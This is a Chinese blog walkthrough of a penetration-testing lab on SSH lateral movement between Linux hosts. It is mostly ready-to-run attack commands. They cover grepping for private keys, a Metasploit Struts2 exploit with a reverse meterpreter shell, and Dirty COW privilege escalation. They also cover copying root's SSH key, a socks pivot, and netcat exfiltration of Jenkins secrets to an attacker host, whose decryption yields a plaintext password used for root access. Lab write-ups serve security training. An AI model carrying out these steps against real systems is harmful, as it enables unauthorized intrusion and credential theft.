内网渗透之linux到linux横向移动-ssh

最新推荐文章于 2023-06-12 14:12:41 发布
最新推荐文章于 2023-06-12 14:12:41 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: 靶机及靶场通关 内网渗透 文章标签: linux ssh 运维 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/130582916
版权

0x01

一般情况下SSH密钥存放在~/.ssh/目录下,也可以文件中搜索已保存的SSH凭证
~/.ssh/config
~/.ssh/known_hosts
~/.bash_history

grep -ir "BEGIN RSA PRIVATE KEY" /*
grep -ir "BEGIN DSA PRIVATE KEY" /*
grep -ir "BEGIN OPENSSH PRIVATE KEY" /

0x02
环境:THP-csk-lab
在这里插入图片描述
1.信息搜集
存活主机 172.16.250.10 172.16.250.30 172.16.250.50
172.16.250端口
22
80
8088
8009
172.16.250.30 端口
22
172.16.250.50 端口
22

2.访问网站进行进一步信息搜集
在这里插入图片描述
80端口:cms:opencms 10.5.3
一些xss不管用
strus2的漏洞没搜到
/struts2-showcase/show-action
在这里插入图片描述

8080:tomcat
在这里插入图片描述
相关漏洞没利用成功
3.msf利用struts漏洞

use exploit/multi/http/struts2_content_type_ognl
set payload linux/x64/meterpreter/reverse_tcp
set rhosts 172.16.250.10
set lhost 172.16.250.15
set rport 80
run

在这里插入图片描述
在这里插入图片描述
无python2,有python3
交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

4.对172.16.250.10主机进行提权
刚开始信息搜集时没找到什么有用的信息,不如说密码
因为还有两台主机,并且都开放了22的ssh端口,可能会用到ssh的内网横向移动手法,如果能找到密码那更好,找不到还一种方法利用ssh的密匙登录,以下提权是为了获取密匙的
提权:
上传漏洞脚本
扫除出脏牛
在这里插入图片描述
脏牛exp有两种,一种是重置密码,另一种是返回一个root的bash
尝试了第一种可能是在kali上编译的,没有成功,正常来说,如果靶机编译失败,可以找另一台内核和发行版本一样的主机上编译在上传
下面的是返回root的bash
上传exp
编译,并执行

gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread
python3 -c "import pty;pty.spawn('/bin/bash')"
chmod +x ./dirtycow-mem
./dirtycow-mem

不敲下面的命令靶机会崩溃
持续稳定:

echo 0 > /proc/sys/vm/dirty_writeback_centisecs
echo 1 > /proc/sys/kernel/panic && echo 1 > /proc/sys/kernel/panic_on_oops && echo 1 > /proc/sys/kernel/panic_on_unrecovered_nmi && echo 1 > /proc/sys/kernel/panic_on_io_nmi && echo 1 > /proc/sys/kernel/panic_on_warn

5.使用ssh进行内网横移
查看172.16.250.10主机历史命令,发现使用密匙对30主机进行了登录
在这里插入图片描述
使用把密匙下载下来

cp root/.ssh/id_rsa /tmp/id_rsa
chmod 777 id_rsa                               #需要赋予权限才可以下载
download  /tmp/id_rsa /root/id_rsa
chmod 0600 id_rsa                            #恢复原来的权限,否则需要输入root密码
ssh -i id_rsa root@172.16.250.30

建立socks服务

run post/multi/manage/autoroute
use auxiliary/server/socks_proxy
set version 4a
run

ssh登录30

ssh -i id_rsa root@172.16.250.30

5.对30主机做信息搜集
在家目录找到了以下信息
在这里插入图片描述
通过搜索发现这些配置是jenkins的
jenkins
——持续、自动地构建/测试软件项目
——监控一些定时执行的任务
查看端口开放情况
在这里插入图片描述
访问8080端口
发现是tomcat
在这里插入图片描述
8009访问不了
所以尝试访问其他目录,尝试访问/jekins
在这里插入图片描述
可以利用以下凭据进行下一台横向移动,用户是db_backup,在本地用户没有这个用户,所以猜测是50的,是密文所以要进行解密
6.利用jenkins的凭据
利用nc把相关密码文件传到kali中

kali
nc -lvp 1234 > master.key
nc -lvp 1234 > hudson.util.Secret
nc -lvp 1234 > credentials.xml
30主机
nc 172.16.250.129 1234 < /home/jenkins/secrets/master.key
nc 172.16.250.129 1234 < /home/jenkins/secrets/hudson.util.Secret
nc 172.16.250.129 1234 < /home/jenkins/credentials.xml

一条对一条的敲,即在kali敲一条,在30主机上敲一条
进行破解密码

python decrypt.py master.key hudson.util.Secret credentials.xml

在这里插入图片描述
密码:
)uDvra{4UL^;r?*h

7.ssh登录50

ssh db_backup@172.16.250.50
)uDvra{4UL^;r?*h

在这里插入图片描述
发现有个sudo组
发现db_backup用户可以执行任意命令

sudo -l

在这里插入图片描述
直接切换到root

sudo su root
)uDvra{4UL^;r?*h

在这里插入图片描述

安装pycrypto时错误:
python3.10安装失败
在这里插入图片描述
3.9安装成功但是破解失败
在这里插入图片描述

3.8安装时不要直接加版本会出错在这里插入图片描述
不加版本也出错了
在这里插入图片描述

解决方法
1.将vistudio 2019或其他vs版本 中的stdint.h文件放进报错的文件夹ucrt中
在这里插入图片描述

2.修改报错的文件inttype.h
修改为引号
在这里插入图片描述

参考文章:

pycrypto安装失败

mushangqiujin
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透-内网代理穿透和内网横向移动
lza20001103的博客
09-23 2131
内网代理穿透和内网横向移动 文章目录内网代理穿透和内网横向移动前言内网代理穿透nctermite(ew)ssh正向代理(A,B,C)msf设置路由和sock4代理访问内网流量内网横向移动后记 前言 进入内网后,我们就要扫描内网中有哪些主机了,重点是我们外网是无法访问内网的主机的,所在网段是不一样的,这时就需要我们设置代理和路由进行访问内网的流量了。上一期讲解了信息收集的相关内容,收集网段,补丁和域中成员以及域控的信息,对以下的横向移动至关重要,对后期的提权做好了准备。 内网代理穿透 首先,我们介绍几种代理工
内网渗透横向攻击流程
Candour_0的博客
02-06 218
内网渗透横向攻击流程
内网渗透Linux上线
剁椒鱼头没剁椒的博客
06-12 3147
默认情况下CS是不支持上线Linux的,只支持上线Windows,但是再事情的渗透测试过程中,一般企业重用的业务通常都是运行再Linux上的,这就会导致原版的CS无法上线Linux,而这时候可以使用crossC2插件来解决这个问题。
横向移动的思路与实现
热门推荐
Shanfenglan's blog
08-28 10万+
前言 当拿到某域内的一台机器后,需要进一步的扩大战果,这时候就需要进行横向移动横向移动这部分的技术的都是基于信息收集的结果才能实现,信息收集很重要,切记。 推荐几种实现方式: 利用现有exp来对操作系统进行攻击,例如ms17010,ms08067等。 利用密码爆破ssh或者对smb服务进行爆破,可利用impacket工具实现。 利用服务端应用的rce漏洞,如tomcat等中间件漏洞。 制作黄金票据进行横向移动,可利用impacket与mimikatz工具实现。 利用windows的自带命令远控对方主机。
内网横向渗透
weixin_58782362的博客
09-28 470
因为在目标主机上面上传套件在实战中不实用,可能照成数据包丢失,也可能被查杀,也有可能目标主机没有相对的语言解析,所以最好的办法就是直接使用代理。建立ipc链接到目标主机--拷贝要执行的命令脚本到目标主机--查看目标时间、创建计划任务定时执行拷贝到的脚本--删除ipc链接。外部:(交互式,外人开发工具),本地使用./administartor,域主机使用god/administartor。下载对应release,建立socks连接,设置socks代理,配置规则,调用!内部:(交互式windows官方工具)
kali linux 渗透测试之内网渗透
05-02
理论加实战结合,学习后具备自动化批量控制内网主机的能力,具备安全工程师岗位的基本能力。专注培养高薪网络安全人才,帮助大家了解并学习网络安全,传授黑白帽实战技能,带领零基础小白正式踏入入门阶段。
linux 离线安装perl-IPC-Cmd
最新发布
12-25
linux 离线安装perl-IPC-Cmd
linux内网渗透1
08-03
综上所述,此过程展示了Linux内网渗透的基本步骤,包括漏洞利用、权限提升、信息收集、横向移动以及内网资源的探测。同时也揭示了网络安全的重要性,尤其是对敏感信息的保护和良好的系统管理实践。对于IT安全从业...
linux实现内网穿透
01-09
linux实现内网穿透 ...这里因为外网机无法主动访问连接到内网机上,所以这里我们使用ssh让内网机能够连接上外网机 内网机上执行 ssh -o ServerAliveInterval=60 -f -N -R 9090:192.168.0.154:22 root@1.1.1.1
linux-内网开发环境域名代理服务
08-13
内网开发环境域名代理服务,本地开发环境代理和配置
电脑教程内网渗透之内网穿透.rar
10-25
电脑教程内网渗透之内网穿透
内网渗透-最实用的横向移动总结
告白的博客
10-04 5691
0x00 内网横向移动简介 上期介绍了内网的信息收集,接下来一度时间实现内网的横向移动,内网的渗透过程一一介绍,通过内网主机掌控整个域环境。 0x01 内网横向移动的两种方式 内网的横向移动的方式有传递和漏洞两种: 所谓传递就是通过内置的一系列协议与命令,例如:at,schtasks,psexec,smbexec,wmic,PTH,PTT,PTK等,实现达到渗透其他内网主机,所谓的内网渗透其实就是一个内网的信息收集,掌握了域内的账户密码信息,主机信息,也就掌握了整个域,我们就是要通过横向移动的方式去获取到
Linux下Redis的安装以及常用命令总结
俯κǎń迗倥
04-04 217
Linux下Redis的安装和部署 一、Redis介绍 Redis是当前比较热门的NOSQL系统之一,它是一个key-value存储系统。和Memcache类似,但很大程度补偿了Memcache的不足,它支持存储的value类型相对更多,包括string、list、set、zset和hash。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作。在此基础上,Re...
Linux渗透之反弹Shell命令解析
deeplearnings的博客
08-18 9852
前言 当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的。在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个命令就可以反弹shell了,却没有一篇文章介绍这些命令究竟是如何实现反弹shell的。既然大牛们懒得科普,那我就只好自己动手了。本文就来探讨一下相关命令实现的原理。 B
003--横向渗透的常见方法
weixin_44508748的博客
07-22 2935
在已经攻占部分内网主机的前提下,利用现有的资源尝试获取更多的凭据、更高的权限,进而达到控制整个网段、拥有最高权限的目的。在很多时候,内网渗透的起点往往只是一台通过各种漏洞漏洞攻陷的跳板,通过这个突破口去不断扩大在本网段内的战果,是为横向渗透。 一、系统漏洞 0day 二、流量监听 三、ARP欺骗 四、服务密码攻击 ...
【基础篇】————28、横向渗透
Fly_鹏程万里
05-27 2759
0x00 端口渗透 端口扫描 端口的指纹信息(版本信息) 端口所对应运行的服务 常见的默认端口号 .尝试弱口令 端口爆破 hydra 端口弱口令 NTScan Hscan 自写脚本 端口溢出 smb ms08067 ms17010 ms11058 ... apacheftp... 常见的默认端口 1、web类(web漏洞/敏感目录) 第三方通用组...
横向移动
wei_43990108的博客
04-20 5204
横向移动 横向移动—APT Windows横向移动攻击的检测 https://www.4hou.com/technology/10430.html 概述 横向移动技术广泛应用于复杂的网络攻击中,特别是高级持续性威胁(APT)。攻击者使用这些技术访问受感染系统中的其他主机,并访问敏感资源(如邮箱,共享文件夹或凭证)。这些可以用于渗透其他机器、权限提升或者窃取更有价值的凭证。通过横向移动攻击最终可...
linux 中文 横向,linux 命令 - 横着走的螃蟹 - OSCHINA - 中文开源技术交流社区
weixin_34365489的博客
05-09 412
1、防火墙#1.iptables (centos 6.x)#a.开关chkconfig iptables on #开启,重启后生效chkconfig iptables off #关闭,重启后生效service iptables start #开启,即时生效,重启后失效service iptables stop #关闭,即时生效,重启后失效#b.使用iptables -L -n #line numb...
内网渗透 linux
08-18
Linux系统中进行内网渗透,攻击者可以利用一些常见的工具和技术来获取未授权访问、提权或控制其他主机。以下是一些常见的内网渗透技术和建议的对策: 1. 弱密码攻击:攻击者可能尝试猜测或暴力破解Linux系统上的密码。对策:确保使用强密码策略,并定期更改密码。禁用不必要的远程登录方式,如SSH密码登录,改为使用公钥身份验证。 2. 服务漏洞利用:攻击者可能利用Linux系统上运行的服务中的已知漏洞进行入侵。对策:定期更新和升级系统和软件包,及时修补已知漏洞。关闭不必要的服务或端口,只保留所需的服务,并根据需要配置防火墙规则。 3. 提权攻击:攻击者可能试图通过利用Linux系统上的特权升级漏洞来获取管理员权限。对策:限制用户的权限,确保每个用户只具有适当的权限。定期检查系统日志,监测异常行为和特权升级尝试。及时安装操作系统和内核的安全更新。 4. 社交工程:攻击者可能使用欺骗、伪装或其他手段来获取用户的敏感信息。对策:加强安全意识培训,教育员工有关社会工程学攻击的风险和防范措施。提醒用户不要随意点击可疑的链接或打开未知来源的附件。 5. 无线网络攻击:如果目标网络中有无线网络,攻击者可能尝试通过无线网络入侵内部网络。对策:使用强密码和加密协议保护无线网络。禁用不必要的无线网络功能,并配置合适的防火墙规则。 6. 内部系统扫描:攻击者可能在内网中进行系统扫描,探测其他主机的漏洞。对策:配置入侵检测系统(IDS)或入侵防御系统(IPS),监测内部网络流量,及时发现和阻止异常活动。 请注意,这些建议只是一些基本的防范措施。实际情况可能因网络环境和需求而异。为了确保Linux系统的安全,建议定期进行漏洞扫描、安全审计和渗透测试,并采取相应的安全措施来减少潜在的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值